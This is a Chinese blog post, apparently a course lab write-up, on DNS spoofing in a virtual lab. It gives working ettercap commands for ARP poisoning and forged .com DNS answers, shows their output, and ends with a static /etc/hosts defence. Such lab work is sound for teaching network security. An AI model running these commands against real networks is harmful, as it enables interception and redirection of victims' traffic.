dns欺骗

最新推荐文章于 2022-12-22 11:22:34 发布
最新推荐文章于 2022-12-22 11:22:34 发布
阅读量501 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45162687/article/details/92799100
版权

 

 

【目的】

DNS(DomainName System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用记住IP地址。DNS协议运行在UDP协议之上,使用端口号53,DNS并不包含任何认证机制,因此第三方可以对DNS数据包进行伪造。本试验将进行DNS Spoofing攻击实验,实现

  • 理解DNS运行机制;
  • 了解DNS Spoofing攻击原理和防御办法。

【环境】

根据提供的实验环境,kali节点作为攻击者,Seed Ubuntu节点作为受害方,通过在Kali节点上允许ettercap软件,对Seed Ubuntu进行DNS Spoofing攻击。

【工具】

实验中的虚拟机

【原理】

在两个通信节点之间,攻击者利用DNS Spoofing攻击工具,通过向受害者返回伪造的DNS数据包,欺骗受害者访问到第三方网站。

【步骤】

注:这里的ip是测试环境的ip,自己做实验时需要替换成实验环境中的ip

1.编辑ettercap的dns配置文件

Kali系统中,Ettercap的配置文件默认位置在/etc/ettercap/etter.dns。用文本编辑其打开此文件,并添加

*.com A 192.168.200.10

即设置所有以.com后后缀的域名解析时,均解析到Kali节点自己的IP地址192.168.200.10。

2.开启kali的nginx服务
进入/var/www/html目录,将已经存在的 index.html 做一下备份
mv index.html index.html.bak

新建另外一个 index.html 文件并写入以下内容
vim index.html #新建并编辑

内容如下
<p>Hello,you hava been hacked!</p>

启动服务

service nginx start

3.启动ettercap

开启kali端口转发功能

echo 1 > /proc/sys/net/ipv4/ip_forward

在Kali系统中,执行

ettercap –T –i eth0 –P dns_spoof -M arp:remote /seed_ip// /gateway//

命令选项中,-T表示使用命令行文本方式,-i eth0表示监听的网络接口,-P表示使用dns_spoof的攻击插件,-M arp表示使用arp欺骗成为中间人,从而进行dns_spoof攻击。执行结果如下图所示:

root@kali:~# ettercap -T -i eth0 -P dns_spoof -M arp:remote /seed_ip// /gateway//
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
  eth0 -> 00:0C:29:DA:EE:F6
	  192.168.200.10/255.255.255.0
	  fe80::20c:29ff:feda:eef6/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 65534 EGID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
7 hosts added to the hosts list...
ARP poisoning victims:
 GROUP 1 : ANY (all the hosts in the list)
 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

4.受害节点访问网址

SeedUbuntu为本实验中的攻击受害节点,在Seed Ubuntu系统中,运行arp –a命令,显示本地arp缓存,如下图所示

root@ubuntu:/home/seed# arp -a
? (192.168.200.1) at 00:0c:29:da:ee:f6 [ether] on eth0
? (192.168.200.125) at 00:0c:29:da:ee:f6 [ether] on eth0
? (192.168.200.2) at 00:0c:29:da:ee:f6 [ether] on eth0
kali.local (192.168.200.10) at 00:0c:29:da:ee:f6 [ether] on eth0

可以看出,Kali节点已经成功成为了Seed Ubuntu和VMware虚拟机交换机之间的中间人,可以截取到Seed Ubuntu与互联网间的任何数据包。

此时,在Seed Ubuntu的命令行中执行nslookup命令,查询任意.com网址,如www.baidu.com或www.sina.com,其结果如下:

root@ubuntu:/home/seed# nslookup www.baidu.com
Server:		8.8.8.8
Address:	8.8.8.8#53
Name:	www.baidu.com
Address: 192.168.200.10
[01/21/2016 05:20] root@ubuntu:/home/seed# nslookup www.sina.com
Server:		8.8.8.8
Address:	8.8.8.8#53
Name:	www.sina.com
Address: 192.168.200.10

同时,用浏览器访问www.baidu.com/index.htm网址,结果如下图所示:

在本实验手册提供的虚拟机环境中,Kali节点默认在80端口运行Web服务,因此当客户访问www.baidu.com时被DNS spoof解析到了192.168.200.10/index.htm,所以Seed Ubuntu中浏览器显示的是Kali系统Web服务的页面内容。

5.DNS/IP静态绑定防御

DNSSpoofing攻击成功的原因是因为Seed Ubuntu接收到了错误的映射关系,因此,若在Seed Ubuntu中进行DNS和IP的静态绑定,SeedUbuntu下的浏览器将直接访问静态绑定IP,从而利用避免了DNSSpoofing。静态绑定方法简单,易于实验验证,但因需人工绑定,实际网络环境中应用不广。

SeedUbuntu系统下的默认映射文件位置为/etc/hosts,用文本编辑器编辑此文件,加入欲绑定的映射关系,如:

192.168.200.124 www.baidu.com

重启网络连接。此时,再利用浏览器访问www.baidu.com/index.htm时,域名将直接解析到Seed Ubuntu自身的IP地址192.168.200.124,即访问了Seed Ubuntu自身的Web服务,如下图所示:

在/etc/hosts文件中进行DNS/IP绑定时,www.baidu.com也可以绑定到百度真实IP地址,本实验中将其绑定到Seed Ubuntu自身IP,是为了说明若/etc/hosts被恶意程序修改,这种静态绑定方式就成为一种最简单的DNS
Spoofing方法。

q935829913
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Charles——charles 工具栏Tools总结——DNS欺骗/DNS Spoofing
小白龙白龙马的博客
03-06 614
DNS欺骗/DNS Spoofing 功能:通过将您自己的主机名指定给远程地址映射来欺骗DNS查找 一般的开发流程中,在上线之前都需要在测试环境中先行进行验证,而此时手机客户端请求的域名是不太容易改变的,可以通过设置dns式把域名转发到测试机上,具体设置Tools->DNS Spoofing Settings 比如要把所有包含xxxxxx.com的域名转到10.0.0.71的服务器上,...
DNS欺骗-教程详解
wzhua的博客
08-10 5470
DNS欺骗-教程详解,有环境下载链接
网络安全基础——DNS欺骗
m0_57077614的博客
12-22 1926
DNS欺骗 原理+实操
Python-scapy(白帽)[ARP无法欺骗手机吗][DNS欺骗不了https吗]
黑日里不灭的light
01-22 1544
一.scapy基础 1.用法 1.1 导入 from scapy.all import * 1.2 分层 p = Ether()/IP()/TCP() 2.函数 2.1 ls 格式:ls() 解释:查看指定内容发送网络包的详细配置信息 格式:p.summary() 解释:让用户直观而简单的查看到数据包描述 格式:p.show() 解释:让用户直观而丰富的查看到数据包描述 2.2 wrpcap 格式:wrpcap('x.cap',p) 解释:将p变量下的内容写入cap文件中 格式:p=rdpcap('x
DNS欺骗实验过程和分析
记录学习,一起进步
11-13 1551
基于DNS欺骗实验操作和分析过程
ettercap实现dns欺骗过程
04-13
ettercap是一款功能强大的网络嗅探和中间人攻击工具,尤其在执行DNS欺骗DNS Spoofing)时表现出色。DNS欺骗是一种网络安全攻击手段,通过篡改目标计算机的DNS查询响应,将用户重定向到攻击者控制的恶意网站,从而...
dnschef实现dns欺骗
04-13
DNS欺骗【下】----dnschef实现 https://blog.csdn.net/redwand/article/details/105495873
ettercap实现dns欺骗报文2
04-13
ettercap实现dns欺骗 https://blog.csdn.net/redwand/article/details/105481042
ettercap实现dns欺骗报文1
04-13
DNS欺骗【上】----ettercap实现 https://blog.csdn.net/redwand/article/details/105481042
DNS欺骗源代码
04-11
这里提供的"DNS欺骗源代码"是一个实现局域网内DNS欺骗的程序,可以用于学习和理解这种攻击式。 首先,我们要理解DNS查询和响应的过程。当用户在浏览器中输入一个域名时,本地计算机首先会查询本地DNS缓存,如果...
使用CAIN进行简单的ARP和DNS欺骗攻击.doc
06-22
使用CAIN进行简单的ARP和DNS欺骗攻击.doc
网络攻防技术——DNS欺骗
学习记录
02-28 5136
一、题目 本实验的目标是让学生获得对DNS(域名系统)的各种攻击的第一手经验。DNS是互联网的电话簿;它将主机名转换为IP地址,反之亦然。这种转换是通过DNS解析实现的,这种解析发生在幕后。DNS欺骗攻击以各种式操纵此解析过程,目的是将用户误导到其他目的地,这些目的地通常是恶意的。本实验室主要研究几种DNS欺骗攻击技术。学生将首先设置和配置DNS服务器,然后在实验室环境中的目标上尝试各种DNS欺骗攻击。 第一个大实验任务(本地DNS欺骗)中进行的攻击假设攻击者位于同一本地网络上,因此可以嗅探DNS数据包。
【智能路由器】动态域名(基于netfilter编程的DNS数据伪造)
热门推荐
图像、视频、算法、Linux
12-09 2万+
【智能路由器】系列文章连接 http://blog.csdn.net/u012819339/article/category/5803489本文利用netfilter框架,做了一个在路由器上运行的Linux内核模块,该模块能够拦截指定域名解析的请求数据包,并且伪造对应的DNS应答包,送入网络。模块作用机理在netfilter的框架的prerouting点,挂接我们的钩子函数,在钩子函数里实现域名
解析中间人攻击--DNS欺骗
04-24 4221
DNS欺骗   DNS欺骗是这样一种中间人攻击形式,它是攻击者冒充域名服务器的一种欺骗行为,它主要用于向主机提供错误DNS信息,当用户尝试浏览网页,例如IP地址为XXX.XX.XX.XX ,网址为www.bankofamerica.com,而实际上登录的确实IP地址YYY.YY.YY.YY上的www.bankofamerica.com ,用户上网就只能看到攻击者的主页,而不是用户想要取得的网
DNS欺骗实验
AC1145的博客
01-03 1005
DNS欺骗 DNS欺骗简介 实验操作 本次实验操作比较简单,不过是基于ARP欺骗,需要在实现了ARP欺骗的基础上进行。 1 配置欺骗网址 先单击左侧列表“ARP-DNS”,单击鼠标右键,选择“添加到列表”项,输入待欺骗网址:www.baidu.com,再单击“解析”,输入重定向网址“www.163.com”,点击:确定后,163所对应的IP地址自动填入对话框中。 点击确定如图所示,说明已经把百度...
DNSChef的使用
xiaoxuetu_的博客
07-25 8169
DNSChef是一种在Python中开发的跨平台应用程序。 一、设置DNS代理 1.首先将计算机设置为使用DNS名称服务器工具。 Linux: vim /etc/resolv.conf nameserver 127.0.0.1(如果在本地运行) Windows: 控制面板\所有控制面板项\网络和共享中心 属性--TCP/IPv4 二、运行DNSChef 查询一个域的
python实现dns欺骗_Python黑帽子:ARP 缓存投毒与DNS欺骗
weixin_39646695的博客
12-15 229
#coding=utf-8importosimportsysimportsubprocessfrom scapy.all import *RSN= 48 #管理帧信息元素(Dot11Elt)ID48是RSN信息WPA = 221 #管理帧信息元素ID221是WPA信息Dot11i = {0:'GroupCipher',1:'WEP-40',2:'TKIP',4:'CCMP',5:'WEP...
kali中间人攻击(ARP欺骗实验、DNS欺骗实验)
Hi~ 土拨鼠
11-24 6011
实验目的:使用kali模拟攻击者,利用中间人攻击手段来获取用户登录的用户名和密码 实验环境及拓扑图: win xp:模拟客户机 win 2003:模拟FTP服务器 kali:模拟攻击机(root用户登录) 工具: ettercapkali自带) 中间人攻击原理: 利用的是ARP协议的漏洞 ARP欺骗 实验流程: 开启虚拟机并配置IP win xp: win 2003: kali: 在2003上搭建FTP服务器 验证是否可以访问 开启ARP欺骗以及sniff嗅探 .
python实现dns欺骗_Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
weixin_39646412的博客
12-15 476
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。这里就直接用python的scapy搞。这里是arp的攻击式,你可以做成arp攻击。复制代码 代码如下:#!/usr/bin/python"""ARP attack"""import sys, osfrom scapy.all import *if os.geteu...
ettercap+dns欺骗
最新发布
09-16
ettercap是一种开源的网络安全工具,可以用于执行各种网络欺骗攻击,包括DNS欺骗DNS欺骗是一种常见的攻击技术,它允许攻击者篡改网络中的DNS响应,将用户的网络流量重定向到恶意的网站或服务器上。 要使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值